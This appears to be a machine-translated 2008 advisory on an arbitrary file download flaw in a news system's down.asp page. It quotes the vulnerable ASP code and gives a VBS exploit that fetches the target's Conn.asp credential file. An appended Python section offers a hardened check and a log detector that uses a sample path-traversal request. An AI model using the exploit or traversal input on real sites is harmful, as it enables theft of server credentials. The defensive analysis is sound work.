Boiling Prospect news system arbitrary file download vulnerability - vulnerability warning - the black bar safety net

ID MYHACK58:62200818813
Type myhack58
Reporter Anonymous
Modified 2008-04-16T00:00:00


===============================================================
Author: Tr4c3[dot]126[dot]com  Copyright
===============================================================


Affected versions: Boiling Prospect news system [core: Dust Edge Elegant Environment] V1.1 Access version Finish (SP3)


Vulnerability file: down.asp


Key code:

Const adTypeBinary = 1
FileName = Request.QueryString("FileName")
If FileName = "" Then
    Response.Write "invalid file name!"
    Response.End
End If
' Extension is taken as the text after the last "." of the raw request value
FileExt = Mid(FileName, InStrRev(FileName, ".") + 1)
Select Case UCase(FileExt)
    Case "ASP", "ASA", "ASPX", "ASAX", "MDB"
        Response.Write "illegal operation!"
        Response.End
End Select
Response.Clear
If LCase(Right(FileName, 3)) = "gif" Or LCase(Right(FileName, 3)) = "jpg" Or LCase(Right(FileName, 3)) = "png" Then
    Response.ContentType = "image/*"   ' image files do not bring up the download dialog
Else
    Response.ContentType = "application/ms-download"
End If
Response.AddHeader "content-disposition", "attachment; filename=" & GetFileName(Request.QueryString("FileName"))
Set Stream = Server.CreateObject("ADODB.Stream")
Stream.Type = adTypeBinary
Stream.Open

' The variable name on the next two lines was machine-translated in the source;
' UploadDir is a placeholder for the original identifier.
UploadDir = FileUploadPath   ' directory that stores uploaded files
TrueFileName = UploadDir & FileName   ' raw FileName appended with no path check

Stream.LoadFromFile Server.MapPath(TrueFileName)
While Not Stream.EOS
    Response.BinaryWrite Stream.Read(1024 * 64)
Wend



(No login is required; the request only needs a forged Referer header, for example from a minibrowser tool.)


VBS version of the exploit

Dim strUrl, strData
strUrl = ""   ' target URL (left blank in the original)
Set xPost = CreateObject("Microsoft.XMLHTTP")
With xPost
    .Open "GET", strUrl, False
    .SetRequestHeader "Referer", strUrl   ' Referer set to the same URL
    .Send
    strData = .responseBody
End With

' Write the response body to a local file as binary
Set sGet = CreateObject("ADODB.Stream")
With sGet
    .Mode = 3    ' read/write
    .Type = 1    ' binary
    .Open
    .Write strData
    .SaveToFile "Conn.asp", 2   ' 2 = overwrite if the file exists
End With

Set sGet = Nothing
Set xPost = Nothing
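The key code above appends the raw FileName parameter to the upload directory and only blacklists a handful of extensions, so a value containing a path separator and ".." resolves to a file outside that directory, which is what the VBS request relies on. The following Python is an added example, not code from this advisory or from the news system: it reimplements the down.asp check beside a hardened version, and flags IIS-style log lines carrying such a FileName value. The upload directory, the extension allowlist and the log lines are constructed for the demonstration.

```python
"""Added example (not from the advisory or the news system): the down.asp
filename check next to a hardened version, plus a log-line check."""
from pathlib import Path
from urllib.parse import parse_qs, unquote

UPLOAD_DIR = Path("/var/www/news/upload")          # constructed; down.asp reads it from FileUploadPath
BLACKLIST = {"ASP", "ASA", "ASPX", "ASAX", "MDB"}  # the extensions down.asp refuses
ALLOWLIST = {"gif", "jpg", "png", "zip", "rar"}    # assumption: what the upload form accepts


def vulnerable_resolve(filename: str):
    """Mirror down.asp: blacklist the text after the last '.', then append the
    raw request value to the upload directory with no traversal check."""
    if filename == "":
        return None
    ext = filename.rsplit(".", 1)[-1] if "." in filename else filename
    if ext.upper() in BLACKLIST:
        return None
    return UPLOAD_DIR / filename


def hardened_resolve(filename: str):
    """Accept only a bare file name with an allowlisted extension whose
    resolved path is a direct child of the upload directory."""
    if not filename or any(c in filename for c in "/\\\x00"):
        return None
    if filename.startswith("."):
        return None
    if "." not in filename or filename.rsplit(".", 1)[-1].lower() not in ALLOWLIST:
        return None
    base = UPLOAD_DIR.resolve()
    candidate = (base / filename).resolve()
    if candidate.parent != base:       # defence in depth against odd names
        return None
    return candidate


def escapes_upload_dir(path: Path) -> bool:
    """True when the path down.asp would open lies outside the upload directory."""
    base = UPLOAD_DIR.resolve()
    resolved = path.resolve()
    return resolved != base and base not in resolved.parents


def flag_request(log_line: str) -> bool:
    """W3C-style IIS log line: a down.asp request whose FileName parameter
    carries a path separator or '..', after one extra round of URL decoding."""
    fields = log_line.split()
    if len(fields) < 6:
        return False
    uri_stem, query = fields[4], fields[5]
    if not uri_stem.lower().endswith("/down.asp") or query == "-":
        return False
    for value in parse_qs(query).get("FileName", []):
        decoded = unquote(value)       # catch double-encoded separators
        if ".." in decoded or "/" in decoded or "\\" in decoded:
            return True
    return False


# Constructed sample log lines (date time s-ip method uri-stem query port user c-ip agent referer status)
SAMPLE_LOG = [
    "2008-04-16 10:15:02 10.0.0.5 GET /news/down.asp FileName=photo1.jpg 80 - 192.0.2.10 Mozilla/4.0 http://example.test/news/list.asp 200",
    "2008-04-16 10:15:09 10.0.0.5 GET /news/down.asp FileName=..%2F..%2Freadme.txt 80 - 192.0.2.10 Mozilla/4.0 http://example.test/news/list.asp 200",
    "2008-04-16 10:15:11 10.0.0.5 GET /news/list.asp - 80 - 192.0.2.10 Mozilla/4.0 - 200",
]


def suspicious_requests(lines):
    """Return the log lines that flag_request marks as traversal attempts."""
    return [line for line in lines if flag_request(line)]


if __name__ == "__main__":
    for name in ("photo1.jpg", "../../readme.txt", "notes.txt"):
        print(name, "->", vulnerable_resolve(name), "|", hardened_resolve(name))
    print(len(suspicious_requests(SAMPLE_LOG)), "suspicious request(s)")
```

The hardened check rejects separators outright rather than trying to normalise them, allowlists extensions instead of blacklisting, and still verifies the resolved path after the string checks; the log check is the same condition applied to what the server recorded.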